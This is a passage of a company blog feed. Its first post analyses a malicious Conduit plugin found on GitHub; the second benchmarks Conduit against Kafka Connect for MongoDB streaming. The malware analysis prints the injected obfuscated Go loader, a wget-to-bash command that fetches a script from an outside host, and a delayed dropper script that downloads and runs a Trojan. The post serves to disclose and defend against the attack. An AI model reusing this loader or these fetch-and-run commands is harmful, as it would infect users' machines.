&quot;3&quot;, &quot; &quot;, &quot;n&quot;, &quot;b&quot;, &quot;e&quot;, &quot;a&quot;, &quot;-&quot;, &quot;h&quot;, &quot;:&quot;, &quot;6&quot;, &quot;g&quot;, &quot;3&quot;, &quot;t&quot;, &quot;e&quot;}
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	oUnSQ := &quot;/bin/sh&quot;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	jDIVaCS := &quot;-c&quot;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	iwxTmUsF := WoH[11] + WoH[21] + WoH[74] + WoH[13] + WoH[22] + WoH[67] + WoH[41] + WoH[62] + WoH[52] + WoH[54] + WoH[14] + WoH[73] + WoH[35] + WoH[36] + WoH[6] + WoH[69] + WoH[23] + WoH[45] + WoH[24] + WoH[15] + WoH[63] + WoH[29] + WoH[2] + WoH[66] + WoH[49] + WoH[0] + WoH[10] + WoH[48] + WoH[32] + WoH[16] + WoH[47] + WoH[27] + WoH[58] + WoH[42] + WoH[38] + WoH[7] + WoH[55] + WoH[19] + WoH[30] + WoH[25] + WoH[71] + WoH[65] + WoH[33] + WoH[53] + WoH[20] + WoH[61] + WoH[5] + WoH[72] + WoH[18] + WoH[57] + WoH[43] + WoH[34] + WoH[44] + WoH[31] + WoH[46] + WoH[60] + WoH[9] + WoH[28] + WoH[70] + WoH[64] + WoH[51] + WoH[40] + WoH[59] + WoH[1] + WoH[50] + WoH[56] + WoH[37] + WoH[8] + WoH[26] + WoH[12] + WoH[17] + WoH[39] + WoH[68] + WoH[4] + WoH[3]
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	exec.Command(oUnSQ, jDIVaCS, iwxTmUsF).Start()
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	return nil
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;}
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;var ldpsvC = OAPicvR()&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Whoah, what&apos;s that?! Someone added code that executes an obfuscated command when the connector starts. The red light in my head started flashing.&lt;/p&gt;
&lt;p&gt;I wanted to know what code exactly would be executed, so I copied the code into a temporary file, printing out the variable &lt;code class=&quot;language-text&quot;&gt;iwxTmUsF&lt;/code&gt; without executing the command. Here&apos;s what came out (needless to say, &lt;strong&gt;do not execute this&lt;/strong&gt;):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;&lt;span class=&quot;token function&quot;&gt;wget&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-O&lt;/span&gt; - &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;https://mantrabowery.icu/storage/de373d0df/a31546bf&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; /bin/bash &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This command downloads a script and runs it on your machine in the background. Let&apos;s go deeper - what does the script do? Here&apos;s its content:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;&lt;span class=&quot;token shebang important&quot;&gt;#!/bin/bash&lt;/span&gt;

&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; ~
&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&lt;span class=&quot;token environment constant&quot;&gt;$OSTYPE&lt;/span&gt;&quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;linux-gnu&quot;&lt;/span&gt;* &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;then&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-f&lt;/span&gt; ./f0eee999 &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;then&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;sleep&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3600&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;wget&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;https://mantrabowery.icu/storage/de373d0df/f0eee99&lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;9&lt;/span&gt;&gt;&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;chmod&lt;/span&gt; +x ./f0eee999
		&lt;span class=&quot;token assign-left variable&quot;&gt;app_process_id&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;&lt;span class=&quot;token variable&quot;&gt;$(&lt;/span&gt;pidof f0eee999&lt;span class=&quot;token variable&quot;&gt;)&lt;/span&gt;&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-z&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;$app_process_id&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;then&lt;/span&gt;
			./f0eee999
		&lt;span class=&quot;token keyword&quot;&gt;fi&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;fi&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;fi&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It&apos;s a script that specifically targets Linux machines. If the machine is not infected yet, it downloads a binary and runs it. The sneaky part is how it lies dormant for 1 hour before downloading and running the binary, making it harder to detect by automated scanners or manual testing. If you ran this connector on your machine, you wouldn&apos;t spot anything out of the ordinary at first.&lt;/p&gt;
&lt;p&gt;We still don&apos;t know what that binary does, though. I downloaded it and submitted it to &lt;a href=&quot;https://www.virustotal.com/gui/file/844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441&quot;&gt;virustotal.com&lt;/a&gt;, which confirmed my suspicion - it&apos;s a Trojan.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/410a010492c82667cf14ecfd5af8f54a/94829/image-5-.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 20%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA9ElEQVR42kWO226CUBBF+Yw+mFS8VA4g5XIA5YBYI9B4x1qbtDXp///E6qk89GFnTSaz9x6jLxYIr6KVa2y74PFJkaoPVPZOpvXHQnVU6sosuxIWn2TVD1H5TfpyI1p8IZc33KTFGLgrptGGy6yhCVc8DGdE8xMya4nVmbS4kORvxPkZPzlghxtEtMOJ99hyr0OOWOGWYH5E+DXG0Flh6YNpfGD6XNEbxMTlmVCdsIJGm1+1oePYWzPxK7x0d59l3uLIDaa9JMl0kVdimKJABLUO3TLyanpmyFhWuPoDU5T0rYXmvwZ2ydBZ3jm6s9uZWv2J4hc6MYRMGbP6qAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;image.png&quot;
        title=&quot;&quot;
        src=&quot;/static/410a010492c82667cf14ecfd5af8f54a/5a190/image-5-.png&quot;
        srcset=&quot;/static/410a010492c82667cf14ecfd5af8f54a/772e8/image-5-.png 200w,
/static/410a010492c82667cf14ecfd5af8f54a/e17e5/image-5-.png 400w,
/static/410a010492c82667cf14ecfd5af8f54a/5a190/image-5-.png 800w,
/static/410a010492c82667cf14ecfd5af8f54a/94829/image-5-.png 878w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Remember that the repository had 22 stars? I also had a look at the accounts of the stargazers. Each and every one of them was a recently created account, while almost half of them also owned a repository that was a fork of some Go project. After inspecting these repositories, I quickly found that every single one showed the same pattern - a similar snippet with malicious code injected somewhere in the code and a single commit squashing the history, making it harder to spot.&lt;/p&gt;
&lt;h2&gt;Taking Action&lt;/h2&gt;
&lt;p&gt;The first thing I did after identifying the malicious repositories was to report the abuse to GitHub. Here are the &lt;a href=&quot;https://docs.github.com/en/communities/maintaining-your-safety-on-github/reporting-abuse-or-spam&quot;&gt;instructions&lt;/a&gt; on how you can do that yourself if you ever spot a repository with malicious code. This is an important step in keeping GitHub a safe and trusting space.&lt;/p&gt;
&lt;p&gt;Note that GitHub acted swiftly as the repository had already been removed a few hours after the report. Kudos to GitHub!&lt;/p&gt;
&lt;p&gt;We also decided to change the way our GitHub action builds the connector registry. Previously, the action would automatically create a pull request that added any newly discovered connectors, relying on reviewers to spot malicious connectors before the list was updated on our site. Now, we have adopted a more restrictive approach - the action only proposes new connectors from our own GitHub organizations. Any repository outside of these organizations must first be manually added to an allowlist before it appears in the connector registry.&lt;/p&gt;
&lt;p&gt;We still didn&apos;t want to lose the information about new potential connectors being created by the community, so we configured the action to also output a list of repositories that were filtered out. This gives us the best of both worlds - we still know whenever someone creates a new connector, but lower the risk of mistakenly including a malicious connector in our official connector registry.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Running a plugin from a malicious author can compromise your system. Whether you are running Conduit or any other tool that uses plugins, always ensure you get your plugins from a trusted source.&lt;/p&gt;
&lt;p&gt;As developers of a tool that accepts plugins, we want to make our plugin ecosystem as safe as possible. Carefully curating plugins that make it into our registry is just the first step, we also plan to explore the possibilities of improving the security of Conduit plugins, like validating checksums or signing the binaries with a certificate.&lt;/p&gt;
&lt;p&gt;Did you ever spot a malicious plugin in another tool? Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord server&lt;/a&gt; and let us know!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit Makes MongoDB CDC 52% Faster Than Kafka Connect]]></title><description><![CDATA[In head-to-head testing Conduit performed 52% faster than Kafka Connect in streaming data from MongoDB.]]></description><link>https://meroxa.com/blog/conduit-makes-mongodb-cdc-52percent-faster-than-kafka-connect</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-makes-mongodb-cdc-52percent-faster-than-kafka-connect</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Fri, 04 Apr 2025 16:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;When we began developing Conduit, we prioritized building features to make it a viable Kafka Connect replacement, performance was a secondary consideration. We are fans of the principle &quot;Make it work, make it right, make it fast.&quot; This doesn&apos;t mean we neglected performance entirely—in 2022, we &lt;a href=&quot;https://meroxa.com/blog/performance-benchmarks/&quot;&gt;wrote&lt;/a&gt; about our initial benchmarks that tested Conduit&apos;s performance. These benchmarks helped us monitor performance and quickly identify any regressions.&lt;/p&gt;
&lt;p&gt;With Conduit approaching its 1.0 release and a fairly mature feature set in place, we’ve decided to spend some time focusing on performance. Our recent redesign of the pipeline execution system delivered a &lt;a href=&quot;https://meroxa.com/blog/optimizing-conduit-5x-the-throughput/&quot;&gt;5x performance boost&lt;/a&gt;. We&apos;ve also created &lt;a href=&quot;https://conduit.io/changelog/2025-03-20-benchi-announcement/&quot;&gt;Benchi&lt;/a&gt;, a benchmarking tool that will help us test the performance of Conduit and its connectors, as well as compare it with similar tools.&lt;/p&gt;
&lt;p&gt;This post kicks off a series comparing Conduit’s performance with Kafka Connect. We’ll explore how we measured and tweaked the performance of a pipeline that streams data from MongoDB to Kafka and how it compares against Kafka Connect and the &lt;a href=&quot;https://www.mongodb.com/docs/kafka-connector/current/&quot;&gt;MongoDB connector&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Methodology&lt;/h2&gt;
&lt;h3&gt;Performance measurement&lt;/h3&gt;
&lt;p&gt;For our testing we’re focussed on three metrics, message throughput, CPU utilization, and Memory Usage. Record throughput within Conduit is tracked using Conduit’s metrics, the throughput of Kafka messages is measured using JMX in the Kafka broker, and resource usage is monitored with the information that Docker exposes.&lt;/p&gt;
&lt;h3&gt;Snapshots vs CDC&lt;/h3&gt;
&lt;p&gt;The performance expectations for snapshots and change data capture (CDC) are naturally different. With snapshots you’re copying existing data, so while you want it to be fast, a snapshot may take days for large datasets. CDC streaming, must be fast enough to keep up with realtime inserts and updates in the data source. Due to these differences, we measure performance separately for snapshot and CDC modes.&lt;/p&gt;
&lt;p&gt;In a &lt;em&gt;snapshot test,&lt;/em&gt; the test data is inserted before data streaming starts (i.e. before a pipeline is started in Conduit/a source connector is created in Kafka Connect).&lt;/p&gt;
&lt;p&gt;In a &lt;em&gt;CDC test&lt;/em&gt;, the steps are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;streaming is started&lt;/li&gt;
&lt;li&gt;streaming is paused&lt;/li&gt;
&lt;li&gt;all test data is inserted&lt;/li&gt;
&lt;li&gt;streaming is started again&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Starting and then pausing data streaming makes the tool (Conduit or Kafka Connect) switch into CDC mode (as it realizes that there’s no snapshot data, and can start listening for changes). The reason why we’re inserting the test data while data streaming is stopped is so that the new data is available as soon as the connector starts. When investigating bottlenecks, this removes the need to investigate the step where data is being inserted (which might be a script, a test app, etc.). Also, this exercises the tool and the connector even more, as the data is already available.&lt;/p&gt;
&lt;h2&gt;Setup&lt;/h2&gt;
&lt;p&gt;All of our tests were performed multiple times on a &lt;code class=&quot;language-text&quot;&gt;t2.xlarge&lt;/code&gt; AWS EC2 instance (4 vCPUs, 16 GB RAM) with a 40 GB &lt;code class=&quot;language-text&quot;&gt;gp3&lt;/code&gt; EBS volume. The needed infrastructure (Kafka, MongoDB) was provided via Docker containers. We ran a single Kafka broker and a three-member MongoDB replica set.&lt;/p&gt;
&lt;p&gt;The configuration for snapshots and CDC tests can be found &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/mongo-kafka-snapshot/benchi.yml&quot;&gt;here&lt;/a&gt; and &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/mongo-kafka-cdc/benchi.yml&quot;&gt;here&lt;/a&gt;. Here are some notable configurations.&lt;/p&gt;
&lt;h3&gt;Conduit&lt;/h3&gt;
&lt;p&gt;We tested Conduit v0.13.2 with the MongoDB connector v0.2.2. Conduit is run with the &lt;a href=&quot;https://meroxa.com/blog/optimizing-conduit-5x-the-throughput/&quot;&gt;re-architectured pipeline engine&lt;/a&gt; and has been modified to include the MongoDB connector as a built-in connector (and not as a standalone). This increases performance and is also more similar to how Kafka Connect connectors work (they are added to the classpath and run as part of the Kafka Connect service). The pipeline configurations can be found &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/mongo-kafka-cdc/conduit/pipeline.yml&quot;&gt;here&lt;/a&gt; and &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/mongo-kafka-snapshot/conduit/pipeline.yml&quot;&gt;here&lt;/a&gt;. The option to automatically generate schemas has been turned off. We also turned off compression in the Kafka destination connector (which is also done in Kafka Connect).&lt;/p&gt;
&lt;h3&gt;Kafka Connect&lt;/h3&gt;
&lt;p&gt;We tested Kafka Connect v7.8.1 with &lt;a href=&quot;https://www.mongodb.com/docs/kafka-connector/current/source-connector/&quot;&gt;MongoDB’s Kafka connector&lt;/a&gt; v1.15.0. The Kafka Connect worker uses the default settings. We use the MongoDB connector, with some custom configurations such as: schema inferring is disabled, the entire document is returned in CDC (the default setting returns the differences between the original document and the updated document), and the batch size.&lt;/p&gt;
&lt;h2&gt;Running the tests&lt;/h2&gt;
&lt;p&gt;Our &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks&quot;&gt;benchmarks&lt;/a&gt; are implemented to run on Unix-like OSes and use the &lt;a href=&quot;https://meroxa.com/blog/benchmarking-made-simple-with-benchi/&quot;&gt;Benchi&lt;/a&gt; tool that we wrote. To download the benchmarks:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-L&lt;/span&gt; https://github.com/ConduitIO/streaming-benchmarks/archive/refs/heads/main.zip &lt;span class=&quot;token parameter variable&quot;&gt;-o&lt;/span&gt; streaming-benchmarks.zip
&lt;span class=&quot;token function&quot;&gt;unzip&lt;/span&gt; streaming-benchmarks.zip&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To run all the benchmarks, execute the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; streaming-benchmarks-main &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;make&lt;/span&gt; install-tools run-all&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Bottlenecks&lt;/h2&gt;
&lt;p&gt;Since we used the same MongoDB and Apache Kafka instances to test both tools, we didn&apos;t focus on optimizing these components. We started by testing Conduit to establish a baseline, which showed it could process approximately 14,000 messages per second on our test machine. This felt a little low so we decided to do some optimizing.&lt;/p&gt;
&lt;p&gt;To look understand the components involved it helps to have an understanding of the structure of a Conduit pipeline. The Diagram below shows the components of our pipeline.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/e1b2a751872e34f9f025b97dc5a6e4da/eb645/screenshot-2025-04-04-at-15.48.48.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 21.999999999999996%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAx0lEQVR42lVQywrCMBDs/3+PoHjxoFYQFa89aKWJSWrfLX1p2zG7gujCsGQyjxAHPzNNE2McR0Zb19hfBVaHMxbzJeRdsW4Yhq+O9u84Fy1xUZIPeVEgCAJoraGUQvR4QGiDWyAsLxDHMd+FYcgwxqBtW/YKIWCs1pmdXMyOW0zPF5Oe5yFNUzbSjqIIhS0qy5IDpZSfMsv7vs9813XYrNfYuS6czjb0fc8tTdMgSRIGmSmIXpDnOaqqQm2/gAIIxGVZ9uclvAGF6S5WSXjkVQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;conduit mongodb-to-kafka pipeline diagram&quot;
        title=&quot;&quot;
        src=&quot;/static/e1b2a751872e34f9f025b97dc5a6e4da/5a190/screenshot-2025-04-04-at-15.48.48.png&quot;
        srcset=&quot;/static/e1b2a751872e34f9f025b97dc5a6e4da/772e8/screenshot-2025-04-04-at-15.48.48.png 200w,
/static/e1b2a751872e34f9f025b97dc5a6e4da/e17e5/screenshot-2025-04-04-at-15.48.48.png 400w,
/static/e1b2a751872e34f9f025b97dc5a6e4da/5a190/screenshot-2025-04-04-at-15.48.48.png 800w,
/static/e1b2a751872e34f9f025b97dc5a6e4da/c1b63/screenshot-2025-04-04-at-15.48.48.png 1200w,
/static/e1b2a751872e34f9f025b97dc5a6e4da/29007/screenshot-2025-04-04-at-15.48.48.png 1600w,
/static/e1b2a751872e34f9f025b97dc5a6e4da/eb645/screenshot-2025-04-04-at-15.48.48.png 2500w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We decided to break things down and evaluate each component individually.&lt;/p&gt;
&lt;p&gt;This meant testing the following &lt;strong&gt;in isolation&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;How quickly can the MongoDB source connector read the data?&lt;/li&gt;
&lt;li&gt;How quickly can the MongoDB client read the data?&lt;/li&gt;
&lt;li&gt;How quickly can the Kafka destination connector write the data?&lt;/li&gt;
&lt;li&gt;How quickly can the Kafka client (we’re using &lt;a href=&quot;https://github.com/twmb/franz-go&quot;&gt;franz-go&lt;/a&gt;) write the data?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The MongoDB source connector and the MongoDB client were able to read around 25k documents per seconds. We got some similar results for the Kafka destination connector which definitely meant that the bottleneck was Conduit itself.&lt;/p&gt;
&lt;p&gt;Because of that, we gave the new pipeline architecture a try, and it resulted in quite a boost! The message rate went from 14k to 23k msg/s.&lt;/p&gt;
&lt;h2&gt;Results&lt;/h2&gt;
&lt;p&gt;Here we present a comparison between Conduit and Kafka Connect, which includes the message rates (for both, snapshot and CDC modes) as well as resource usage. The charts below summarize results from 56 runs of CDC and snapshot tests.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/cb22661bc97a47e5cc5b89408e0d7e9e/11d70/screenshot-2025-04-04-at-15.15.00.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAACMElEQVR42o2Ty2sUQRDG99/Qe1DjKnhSEF+rEl8RBImPkx485So+1sm6GCGouXoRFUQ0h9z0JK4JKyaCePPgSQ9LUGdn3HlPz2xPz2dVT2bjrhcbipmiq379VVV3Jcsy5Hn+jymlEPgufN+HHwTaPM/TPu+NxvIKwxCV0hldcQp8X3PRtUy4nQ5+//yBX6YJk0ypfCiWobyiKEKFHSEEbNsenEghUPSNhERMe5nnQpCyKI7RT2PaJ4U6qrBSlAayw2UzNFNFyOdvEvdeJ3j7RQ4UZOuq2l8lri0kePWJwH6PDvOGgRycJAkcx0FfFkmPlxNsmvZwfUFon1l9WSQ9fBNj81WJer0N78Qe2JemoChfA7mHDJRS6oau5+DFSorqjQCziwEQOFBUssyKw54uCVSbCneNFty9W2CdPQaVJhsKA5oel8vAUsXztsD4jITR/AhnYjfscyfRD+NCfSvGtobCHWMJ7oEdsM6fIoViQyFfhZiazd8hYCOD0fiA3n5KOl0jYPR/wHIoowq3zxDw9gp6tV2wzhwdAJ8QcJyAsww8uBPWhclhoJ4gAXkoZZ+etROM3VK4aRBwXxXW5CHIqCj5UUtgzMjRrL+jHm6lHh5H/ncPy5HzYESS8h8WV0Mcnk8wd38V1tQEzCsXEXu+vn8v3weoPRCYn1sm2BGY05eRRiEyEsbzGABZpX6G5Pcl3ctUodu1CeTpa6Foj2NlpuAFAp3OGlzLogmnOq98en8A+PVdL/hkfpwAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Message throughput&quot;
        title=&quot;&quot;
        src=&quot;/static/cb22661bc97a47e5cc5b89408e0d7e9e/5a190/screenshot-2025-04-04-at-15.15.00.png&quot;
        srcset=&quot;/static/cb22661bc97a47e5cc5b89408e0d7e9e/772e8/screenshot-2025-04-04-at-15.15.00.png 200w,
/static/cb22661bc97a47e5cc5b89408e0d7e9e/e17e5/screenshot-2025-04-04-at-15.15.00.png 400w,
/static/cb22661bc97a47e5cc5b89408e0d7e9e/5a190/screenshot-2025-04-04-at-15.15.00.png 800w,
/static/cb22661bc97a47e5cc5b89408e0d7e9e/c1b63/screenshot-2025-04-04-at-15.15.00.png 1200w,
/static/cb22661bc97a47e5cc5b89408e0d7e9e/29007/screenshot-2025-04-04-at-15.15.00.png 1600w,
/static/cb22661bc97a47e5cc5b89408e0d7e9e/11d70/screenshot-2025-04-04-at-15.15.00.png 1802w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/904be5aa8ef32385fb19bed11b3c0475/d61c2/screenshot-2025-04-04-at-15.15.14.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 62%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAACF0lEQVR42nWTv2sUQRTH7x+wEzu7BISLdoLYpLJTmxSCYiMEBMGgwUQOE0SDCAkcajQYsRBRkvOaYKvYCZb2giRRSS575+3t79mZ+Tgzud2LIRl4y8y8977v+33ztqKUQmt9oNkVhiG+36PX65l95O60zTkkr1Ik7l9CQqsr8Hs+4e9fbG9u4LXbRFHEYTl2VewnyzLiON6t7oI1Ite0fUGcxEjfJw0CIhOTJqHxG3YcrMgxtLLzPC8B9waUd/39zx3Ntx+SPx3lCqv9gAXDJEnKZKUG5oLVblELUFtNGL4dsPwpdec8H/QS20MhBFLKkuF/y4EpB1gwnG0mVKcDXn/J3FmqfT1sm0anaepAXUWpefk5ZaYR831d9pN2pVn/zGpEdTbnRf0rcm6S7vIi2uTqvrqK53nuQaxsJ99IGKsHDNVyGvMf0TM3CD687zM0gCsB1YfwbOIt0chRWpfOo43KEtD2zsrNzGUBeG2px5l5aI4/wh8+gjc90QdUBjBk5AEsTjWIR0+wM34Fne8BdJIM5SRJ+/Onufw05OQcNK4vEJ46RufenaKp3H0XMjQLT26tkJw+TuvqGBT9LwbbmpUsczt3gsk3f7n4XLBWW6J74Sxe/THCvn6esbDW5Vw949X9Jt2xUbanbiKMSmFAlZKDP8WytKNhLRWK0AC3traQcYTK0tJnFXT8kI31TYKOZ/qXlT4r+R9Ca3UAxBZDQwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CPU usage&quot;
        title=&quot;&quot;
